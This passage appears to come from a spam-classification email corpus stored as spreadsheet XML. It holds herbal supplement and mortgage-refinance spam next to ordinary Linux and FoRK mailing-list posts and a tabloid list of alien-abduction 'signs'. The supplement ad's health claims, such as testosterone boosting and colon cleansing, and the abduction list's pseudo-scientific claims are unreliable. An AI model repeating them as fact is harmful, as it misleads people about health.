 especially in the pelvic region. It is commonly used as an
 aphrodisiac to stimulate sexual organs and improve central nervous
 system function.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Maca -&lt;/b&gt; Maca is an adaptogen. It works to create harmony in the
 body, regulating levels of hormones and enzymes to create a state
 of homeostasis.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Catuaba&lt;/b&gt; - Native to Brazil and parts of the Amazon, Catuaba is
 a central nervous system stimulant commonly used throughout the
 world for treating sexual impotence, exhaustion and fatigue.&lt;br /&gt;
 &lt;br /&gt;
  &lt;b&gt;Muira Puama&lt;/b&gt; - A South American herb, Muira Puama has been
 used to treat impotence for hundreds of years. It is highly sought
 after for its strong stimulant qualities.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Oyster Meat -&lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt; Historically
 known as an aphrodisiac, oyster meat contains flavonoids that have
 been shown to stimulate the reproductive system.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 L-Arginine -&lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt; L-Arginine
 is an amino acid which helps to create nitric oxide in the human
 body. Nitric oxide is the most essential substance influencing
 sexual function in both men and women. Nitric oxide promotes
 circulation, resulting in improved blood flow.&lt;/font&gt;&lt;br /&gt;
  &amp;#160;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Oatstraw -&lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt; Used to
 treat fatigue and exhaustion, Oatstraw improves brain and nervous
 system function and has been used to treat impotence. It is
 extremely useful for aiding your body in recovering from
 exhaustion, as well as correcting sexual debility.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Nettle Leaf -&lt;/font&gt;&lt;/b&gt; &lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;Acts as a
 diuretic, expectorant and tonic. It is rich in iron and chlorophyll
 to clean and nourish the blood.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 color="#000000" size="2"&gt;&lt;b&gt;Cayenne&lt;/b&gt; - Cayenne improves
 circulation, increases the metabolic rate and acts as a catalyst
 for other herbs.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 color="#000000" size="2"&gt;&lt;b&gt;Pumpkin Seed -&lt;/b&gt; Pumpkin seed is
 commonly used to strengthen the prostate gland and promote male
 hormone function. Myosin, an amino acid found in pumpkin seeds, is
 known to be essential for muscular contractions.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Sarsaparilla -&lt;/font&gt;&lt;/b&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt; Found along
 the coast of Peru, Sarsaparilla aids in the production of
 testosterone and progesterone.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;
 Orchic Substance -&lt;/font&gt;&lt;/b&gt; &lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;This is an
 extract from bovine testes, and is proven to increase testosterone
 levels without harmful steroids.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Licorice Root&lt;/b&gt; - Licorice root fights inflammation, as well as
 viral, bacterial and parasitic infection. Licorice cleanses the
 colon, and enhances microcirculation in the gastrointestinal
 lining.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Tribulus&lt;/b&gt; - A natural testosterone enhancer, Tribulus can
 improve desire and performance and increase sexual energy. Tribulus
 is also an excellent circulatory and heart tonic and can help
 dilate arteries. In India it is used as a tonic for the urinary
 system.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
 Ginseng Blend (Siberian, American &amp;amp; Korean)&lt;/b&gt; -&lt;/font&gt; &lt;font
 face="Verdana, Arial, Helvetica, sans-serif" color="#000000"
 size="2"&gt;Commonly used by athletes for overall body strengthening,
 Ginseng fortifies the adrenal gland, and promotes healthy
 circulation. It increases the conversion rate of sugars into the
 necessary substrates for the formation of fatty acids in the liver.
 Ginseng stimulates the central nervous system, and is a quick
 antidote for fatigue.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif"
 color="#000000" size="2"&gt;&lt;b&gt;Astragalus&lt;/b&gt; - Regarded as a potent
 tonic for increasing energy levels and stimulating the immune
 system, Astragalus has also been employed effectively as a
 diuretic.&lt;/font&gt;&lt;/p&gt;
 &lt;div align="center"&gt;
 &lt;div align="left"&gt;&lt;font
 face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Boron&lt;/b&gt;
 - Boron helps to prevent the loss of calcium, phosphorus and
 magnesium through the urine.&lt;br /&gt;
  &amp;#160;&lt;/font&gt;&lt;/div&gt;
 &lt;/div&gt;
 &lt;p align="center"&gt;&lt;img
 src="http://zaleos.com/affiliate3/images/smallsupfactz.gif"
 width="332" height="393" /&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;a
 href="http://zaleos.com/affiliate3/maxaman.htm"&gt;&lt;font size="6"&gt;
 ORDER NOW!&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;img
 src="http://zaleos.com/affiliate3/images/guarantee.gif" border="0"
 width="95" height="96" /&gt;&lt;/p&gt;
 &lt;b&gt;Afraid its not for you? Don't worry we offer a LIFETIME
 Guarantee! If your not ecstatic with our product, just return the
 unused portion for a FULL Refund!! No questions will be
 asked!&lt;br /&gt;
 &lt;br /&gt;
 &lt;/b&gt; 
 &lt;center&gt;Thank you for your time and I hope to hear from you
 soon!&lt;/center&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 6828GXPG8-954AFsK4542FFOO2-493vwtv1743VTLq4-l41
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: A moment of silence for the First Amendment &amp; Angry Liberal Yutes
</t>
  </si>
  <si>
    <t xml:space="preserve">Russell Turpin wrote:
 &gt; 
 &gt; Gregory Alan Bolcer:
 &gt; &gt;I'm not sure since I haven't attended civics class
 &gt; &gt;in quite some time, but the First Amendment doesn't cover protected speech,
 &gt; &gt;hate speech, or actions. ..
 &gt; 
 &gt; The first two are wrong. The first amendment DOES
 &gt; protect speech the Supreme Court decides it protects
 &gt; (duh!), and that happens to include most of what
 &gt; people consider hate speech. Unlike many other
 &gt; nations, the US has no laws against hate speech, per
 &gt; se. And the first amendment is the reason for that.
 &gt; 
 This was poking fun of the practice of making
 up differnt types of speech with different
 types of protected status.  I think the
 laws specialing out hate and protected speech
 are ridiculous.  The point I keep trying to make
 is that there's only two types, speech and action. 
 I agree, they are all speech and should be 
 covered by the First Amendment, but
 If hate speech is so protected, why are certain
 states trying to prosecute people for it?  There's
 only two answers and one of them is wrong.
   1) Because hate speech is different and needs to
      have a different level of protection dictated
      by whoever's offended at the time.
   2) It's because it's not just speech, but action.
      A action who's consequences are foreseeable by 
      any reasonable person. 
 Hate speech is mislabeled.  It's really "threat".  I think
 they let the mislabeling perpetuate as there's advantage
 in being able to counter-threat with loss of liberty and
 money through civil and criminal lawsuits for people THEY
 don't like.  
 Greg
 &gt; _________________________________________________________________
 &gt; Join the world?s largest e-mail service with MSN Hotmail.
 &gt; http://www.hotmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Time sync on dialup
</t>
  </si>
  <si>
    <t xml:space="preserve">Smith, Graham - Computing Technician wrote:
 &gt; 
 &gt; ntp.cs.tcd.ie  (thats a strata 2 isnt it? are there any other publically
 &gt; accessible NTP servers in Ireland?)
 tick.indigo.ie
 tock.indigo.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] sysctl.conf
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 04:24:17PM +0100, Kenn Humborg mentioned:
 &gt; man sysctl
 &gt;    # sysctl -p
  Ah right. Actually, sysctl -a was more helpful - shows why setting
 sys.fs.files-nr didn't work..
 KAte
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Start Your Private Photo Album Online!                             13.200
</t>
  </si>
  <si>
    <t xml:space="preserve">1) Fight The Risk of Cancer!
 http://www.adclick.ws/p.cfm?o=315&amp;s=pk007
 2) Slim Down - Guaranteed to lose 10-12 lbs in 30 days
 http://www.adclick.ws/p.cfm?o=249&amp;s=pk007
 3) Get the Child Support You Deserve - Free Legal Advice
 http://www.adclick.ws/p.cfm?o=245&amp;s=pk002
 4) Join the Web's Fastest Growing Singles Community
 http://www.adclick.ws/p.cfm?o=259&amp;s=pk007
 5) Start Your Private Photo Album Online!
 http://www.adclick.ws/p.cfm?o=283&amp;s=pk007
 Have a Wonderful Day,
 Offer Manager
 PrizeMama
 If you wish to leave this list please use the link below.
 http://www.qves.com/trim/?zzzz@example.com%7C17%7C308417
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [fwd: error exmh 2.5 07/13/2001 ]
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_566017948P
 Content-Type: multipart/mixed; boundary="----- =_aaaaaaaaaa0"
 Content-Id: &lt;524.1027546300.0@deepeddy.com&gt;
 ------- =_aaaaaaaaaa0
 Content-Type: text/plain; charset="us-ascii"
 Content-ID: &lt;524.1027546300.1@deepeddy.com&gt;
 Am I the only one for whom typing control-L to the main window causes this 
 error?
 I can't figure out why it occurs.
 Chris
 ------- =_aaaaaaaaaa0
 Content-Type: message/rfc822
 Content-ID: &lt;524.1027546300.2@deepeddy.com&gt;
 Content-Description: forwarded message
 Return-Path: &lt;cwg-dated-1027978154.82a1d5@DeepEddy.Com&gt;
 Delivered-To: cwg-exmh@deepeddy.com
 Received: (qmail 17767 invoked from network); 24 Jul 2002 21:29:14 -0000
 Received: from localhost (HELO deepeddy.vircio.com) ([127.0.0.1]) (envelope-sender &lt;cwg-dated-1027978154.82a1d5@DeepEddy.Com&gt;)
           by localhost (qmail-ldap-1.03) with SMTP
           for &lt;cwg-exmh@deepeddy.com&gt;; 24 Jul 2002 21:29:14 -0000
 To: cwg-exmh@deepeddy.com
 Subject: error exmh 2.5 07/13/2001
 Date: Wed, 24 Jul 2002 16:29:12 -0500
 From: Chris Garrigues &lt;cwg-dated-1027978154.82a1d5@DeepEddy.Com&gt;
 Message-ID: &lt;1027546154.17532.TMDA@deepeddy.vircio.com&gt;
 X-Delivery-Agent: TMDA/0.57
 Wed Jul 24 16:29:12 CDT 2002
 cwg got an error
 Exmh version 2.5 07/13/2001
 TK version 8.3.3
 TCL version 8.3.3
 Linux deepeddy.vircio.com 2.4.18-ac2v5 #1 SMP Sun Mar 31 07:41:15 CST 2002 i686 unknown
 bad text index "header + 1 line"
     while executing
 "$t index "header + 1 line""
     (procedure "SeditBeautify" line 3)
     invoked from within
 "SeditBeautify .msg.t"
     (command bound to event)
 ------- =_aaaaaaaaaa0
 Content-Type: text/plain; charset="us-ascii"
 Content-ID: &lt;524.1027546300.3@deepeddy.com&gt;
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 ------- =_aaaaaaaaaa0--
 --==_Exmh_566017948P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Pxy8K9b4h5R0IUIRAnOgAJ0Uw/GSsuOnUXG7x5WtJOJIYYweqgCghNc3
 9HJtUPNX1D90p7rGch2Ry38=
 =0Che
 -----END PGP SIGNATURE-----
 --==_Exmh_566017948P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This thread is starting to rapidly decay ...
 these are old bits which I cannot explain exactly why I thought they
 were important now or why I went rummaging through back folders to
 find them or even why I felt compelled by a deep sense of inner
 purpose to post them here ...
 http://www.weeklyworldnews.com/stories/2238.html
 20 NEW SIGNS THAT YOU WERE ABDUCTED BY SPACE ALIENS!
 WINSTON-SALEM, N.C. -- You may have been abducted by space aliens --
 and not even know it!
 Psychiatrists, psychologists and UFO experts say millions of people
 all over the world have been kidnapped by extraterrestrials. But most
 of them can't recall the experience because the memory is so painful
 that they've buried it deep in their subconscious minds.
 But there are strong tip-offs that you may be one of the millions who
 have encountered beings from another planet, if you know what to watch
 for.
 Experts at Wake Forest University here, as well as other respected
 institutions around the world, offer 20 startling new indicators that
 you may have had a close encounter:
 1. You experience unexplained nausea or a strange sense of uneasiness
 around the same time each day.
 2. You have an unusual new scar or strange mark on your body --
 particularly on the roof of your mouth or behind an ear.
 3. You often find yourself hungry for oranges or lemons -- even after
 you've had a large meal or eaten enough food to fill your
 stomach. Researchers at Oslo University say this hunger for citrus is
 common in alien abductees.
 4. You have a strong, ever-present feeling that there is some mission
 or important thing you're supposed to do in life and you find yourself
 constantly driven to achieve it or discover what it might be.
 5. You often find yourself going through your trash, or the trash of
 others, without knowing exactly what you're looking for. Swiss UFO
 researchers found that people who have been abducted often find
 themselves unaccountably digging through refuse.
 6. You frequently dream of cattle. Psychologists at the University of
 Paris say it's common for the subconscious mind to substitute a cow or
 bull for an alien being.
 7. You feel you're "special" or "chosen."
 8. You are a vegetarian -- but can't exactly explain why.
 9. You have an overpowering feeling of dread when you see photos or
 drawings of space aliens.
 10. You are prone to addictive or compulsive behavior. This in itself
 is not necessarily indicative of alien abduction. But if there are
 other indicators as well, you could be an abductee.
 11. You wet the bed. Studies in Peru show there's a connection.
 12. You have frequent insomnia.
 13. You are strangely intrigued by old western movies. Psychologists
 say they can't yet explain abductees' fascination with cowboy movies,
 but they say it exists in at least 75 percent of victims.
 14. Electronic devices often go haywire around you for no discernible
 reason.
 15. You have seen -- or think you've seen -- a mysterious, hooded
 figure in or near your home more than once.
 16. Your fingers are stiff, numb or unresponsive for more than an hour
 after you wake up.
 17. You have had -- or currently have -- severe back or neck problems.
 18. You frequently experience a ringing in one ear.
 19. You often get sinusitis or other nasal pain.
 20. You are frequently haunted by the sense that you're being watched.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: pay less interest 3015107654
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
            &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;&lt;FONT size=2 PTSIZE="10"&gt;
       &lt;TABLE 
       style="BORDER-RIGHT: #006600 12px double; PADDING-RIGHT: 4px; BORDER-TOP: #006600 12px double; PADDING-LEFT: 4px; PADDING-BOTTOM: 1px; BORDER-LEFT: #006600 12px double; PADDING-TOP: 1px; BORDER-BOTTOM: #006600 12px double; BORDER-COLLAPSE: collapse" 
       borderColor=#111111 height=338 cellSpacing=0 borderColorDark=#ffffff 
       cellPadding=0 width=539 borderColorLight=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=4 height=423&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD 
           style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
           vAlign=top align=left width=535 height=423&gt;
             &lt;TABLE style="BORDER-COLLAPSE: collapse" borderColor=#111111 
             cellSpacing=0 cellPadding=4 width="95%" bgColor=#ffffff border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top align=right height=424&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#000000 size=2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                         color=#000000&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Dear 
                         Homeowner,&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=left&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif"&gt;*&lt;/FONT&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#ff0000&gt;6.25% 30 Yr Fixed Rate 
                         Mortgage&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT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&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE style="POSITION: relative; BORDER-COLLAPSE: collapse" 
                   borderColor=#111111 height=1 cellSpacing=0 cellPadding=0 
                   width=504 border=0&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top width=325 height=1&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;BR&gt;&lt;/A&gt;&lt;A 
                         href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt" 
                         target=new_win&gt;Click Here for a Free 
                         Quote!&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;A 
                         href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt" 
                         target=new_win&gt; &lt;/A&gt;&lt;/DIV&gt;
                         &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana,Arial,Helvetica,sans-serif 
                         size=2&gt;Lock In YOUR LOW FIXED RATE TODAY&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
                         &lt;DL&gt;
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;NO COST 
                           OUT OF POCKET&lt;/FONT&gt;&lt;/B&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;NO 
                           OBLIGATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;FREE 
                           CONSULTATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;ALL 
                           CREDIT GRADES ACCEPTED&lt;/B&gt;&lt;/FONT&gt; &lt;/DD&gt;&lt;/DL&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face=Verdana,Arial,Helvetica,sans-serif color=red 
                         size=2&gt;&lt;B&gt;&lt;A 
                         href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt"&gt;Rates as 
                         low as 6.25% won't stay this low forever CLICK 
                         HERE&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;FONT size=2 PTSIZE="10"&gt;&lt;B&gt;&lt;FONT 
                         style="FONT-SIZE: 6pt" 
                         face=Verdana,Arial,Helvetica,sans-serif&gt;* based on 
                         mortgage rate as of 5-15-02 as low as 6.25% see lender 
                         for details&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD vAlign=top width=4 height=1&gt;
                         &lt;DIV align=right&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD borderColor=#006600 width=175 bgColor=#ffffff 
 height=1&gt;
                         &lt;H1&gt;&lt;SPAN style="VERTICAL-ALIGN: middle"&gt;&lt;FONT 
                         style="FONT-SIZE: 200px" face=Webdings color=#006600&gt;&lt;A 
                         href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt"&gt;&lt;FONT 
                         color=#006600&gt;H&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/H1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=3 width=472 border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD colSpan=2 height=64&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;B&gt;
                         &lt;TABLE height=38 cellSpacing=2 cellPadding=0 width=482 
                         border=0&gt;
                           &lt;TBODY&gt;
                           &lt;TR&gt;
                             &lt;TD 
                             style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
                             width=327 height=36&gt;&lt;FONT 
                               face=Verdana,Arial,Helvetica,sans-serif 
                               size=2&gt;Apply now and one of our lending partners 
                               will get back to you within 48 
                               hours.&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT style="FONT-SIZE: 6pt" 
                               face=Verdana,Arial,Helvetica,sans-serif&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/FONT&gt;&lt;FONT 
                             face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;
                             &lt;TD style="BORDER-LEFT: 1px solid" width=141 
                             bgColor=#ff0000 height=36&gt;
                               &lt;P align=center&gt;&lt;B&gt;&lt;FONT color=#ffffff size=4&gt;&lt;A 
                               style="TEXT-DECORATION: none" 
                               href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt"&gt;&lt;FONT 
                               color=#ffffff&gt;CLICK 
                             HERE!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;
               &lt;/TR&gt;
             &lt;/TABLE&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;remove http://www.cs220.com/mortgage/remove.html
 &lt;p&gt;
 &lt;/html&gt;
 3015107654
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Is Your Mortgage Payment too HIGH?? We Can Help!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;table width=3D520 cellspacing=3D0 cellpadding=3D14 border=3D4 bordercolor=
 =3D0000A0&gt;
 &lt;tr&gt;&lt;td bgcolor=3D0000A0&gt;
 &lt;font face=3DTahoma,Arial,Helvetica size=3D5 color=3DFFFFFF&gt;&lt;b&gt;Now you can=
  have HUNDREDS of lenders compete for your loan!&lt;/b&gt;
 &lt;br&gt;
 &lt;/font&gt;
 &lt;font face=3DTahoma,Arial,Helvetica size=3D2 color=3DFFFFFF&gt;&lt;BR&gt;&lt;b&gt;
 &lt;li&gt;Refinancing
 &lt;li&gt;New Home Loans
 &lt;li&gt;Debt Consolidation
 &lt;li&gt;Debt Consultation
 &lt;li&gt;Auto Loans
 &lt;li&gt;Credit Cards
 &lt;li&gt;Student Loans
 &lt;li&gt;Second Mortgage
 &lt;li&gt;Home Equity
 &lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td width=3D300&gt;
 &lt;font face=3DArial,Helvetica size=3D3 color=3D000050&gt;&lt;b&gt;Dear Homeowner,&lt;/b=
 &gt;
 &lt;p align=3D"justify"&gt;&lt;font face=3D"times new roman, times" size=3D3 color=3D=
 000050&gt;Interest Rates are at their lowest point in 40 years!
 We help you find the best rate for your situation by matching your needs w=
 ith hundreds of lenders! &lt;u&gt;&lt;B&gt;Home Improvement, Refinance, Second Mortgag=
 e, Home Equity Loans, and More!&lt;/b&gt;&lt;/u&gt; Even with less than perfect credit=
 !&lt;br&gt;&lt;br&gt;This service is &lt;B&gt;100% FREE&lt;/b&gt; to home owners and new home buye=
 rs without any obligation.
 &lt;BR&gt;&lt;br&gt;Just fill out a quick, simple form and jump-start your future plan=
 s today!&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;A href=3Dhttp://61.129.68.19/user0201/index.asp?Afft=3DQM12&gt;&lt;font face=3D=
 verdana,arial,helvetica size=3D5 color=3D00B000&gt;&lt;B&gt;Click Here To Begin&lt;/b&gt;=
 &lt;/FONT&gt;&lt;/A&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;table width=3D516&gt;
 	&lt;tr&gt;&lt;td&gt;&lt;font face=3D"arial,helvetica" size=3D1&gt;Please know that we do no=
 t want to send you information regarding our special offers if you do not =
 wish to receive it.  If you would no longer like us to contact you or feel=
  that you have received this email in error, please &lt;a href=3D"http://61.1=
 29.68.19/light/watch.asp"&gt;click here to unsubscribe&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">"I did not have sex with that woman."
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Mr.
 &gt; FoRK
 &gt; Sent: Monday, September 23, 2002 2:12 PM
 &gt; To: FoRK
 &gt; Subject: Re: Goodbye Global Warming
 &gt; 
 &gt; 
 &gt; ----- Original Message -----
 &gt; From: "John Hall" &lt;johnhall@evergo.net&gt;
 &gt; 
 &gt; &gt; A Green once said that if the Spotted Owl hadn't existed they
 &gt; &gt; would have had to invent it.
 &gt; A Republican once said "I am not a crook".
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sidekick's browser blows
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85524549
 Date: Not supplied
 Anil Dash discovers that the T-Mobile Sidekick's web-browser is pretty 
 arbitrary in which pages it will load and which pages it will throw up its 
 hands at: 
     So I decided I was going to modify my page to conform to your browser's 
     idiocy. I went looking for technical docs on what you do to mangle web 
     pages. None. I went looking for a desktop emulator that I could run to 
     simulate your device on my computer. None. I went looking to see an 
     acknowledgement of the shortcomings of your device, indicating that the 
     situation would be improved. None.  
 Link[1] Discuss[2] (_Thanks, Joe[3]!_)
 [1] http://www.dashes.com/anil/index.php?archives/003378.php
 [2] http://www.quicktopic.com/boing/H/gQqkijtv3NhWZ
 [3] http://joeclark.org/access/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Tired Of Your High Mortgage Rate - REFINANCE TODAY.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
